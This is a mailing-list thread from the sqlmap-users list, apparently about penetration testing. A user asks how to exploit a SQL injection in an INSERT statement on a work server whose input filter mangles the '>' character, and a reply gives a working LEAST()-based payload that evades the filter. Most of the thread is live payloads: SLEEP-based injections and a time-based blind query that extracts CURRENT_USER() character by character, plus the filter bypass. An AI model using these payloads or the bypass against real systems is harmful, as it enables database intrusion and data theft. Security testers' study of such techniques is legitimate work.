Just to add a bit to this, I tried something else that I got to work.
I changed the sqlmap payload by using LEAST(), which became this:
',(SELECT/**/1/**/AND/**/9457=IF((LEAST(ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1)),16)=16),SLEEP(5),9457)/**/)),('
Is this something sqlmap can currently do?
Or maybe there's a better solution for it?
Or should I implement it? (never looked at the sqlmap code, but might
be fun to start digging into).
Cheers for now!
On 2013-06-01 21:57, d...@alcor.se wrote:
> Hey guys, I have a server at work where there's an SQLi in an INSERT,
> but I can't prove that it's actually a threat so far due to a little
> "filter" that replaces some input characters.
> I crafted a little injection that injects a sleep into the insert, and
> makes it sleep for 10 seconds, and then doesn't insert anything (due
> to
> a duplicate error that I made sure to get).
>
> The original query looks like this:
>
> insert into discount_phone_registry (phone_nbr,reg_date) values
> ('111',date(now()));.
> And the injection is in the phone_nbr, so I made the following
> injection: 111',(SLEEP(10))),('111
> And it then becomes: insert into discount_phone_registry
> (phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
> So, so far so good, right?
>
> Well when I wanted to use sqlmap, I noticed that our filter is doing
> some stupid things ^^
> This is the payload from sqlmap
>
> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
>
> But as it gets submitted in the form, it becomes
>
> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
>
> Notice how the > became a _
> The tampering scripts I'm using are space2comment and charencode, and
> charencode actually seems to trick it, since I'm getting the
> less/grater
> char in the error output from the web server now.
> If I copy/paste the payload directly from the web server error output,
> directly into the MySQL client and run it, it works.
>
> Is there anything else I can try to get this to work?
>
> PS: If it helps I just noticed this!
>
> 1064 - You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use
> near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
> insert into discount_phone_registry (phone_nbr,reg_date) values
> ('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
>
> Notice how it complains on ";16" which is probably the encoded > sign
> (>).
>
> Thanks in advance! :-)
>
>
>
>
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite
> It's a free troubleshooting tool designed for production
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite
It's a free troubleshooting tool designed for production
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://p.sf.net/sfu/appdyn_d2d_ap2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
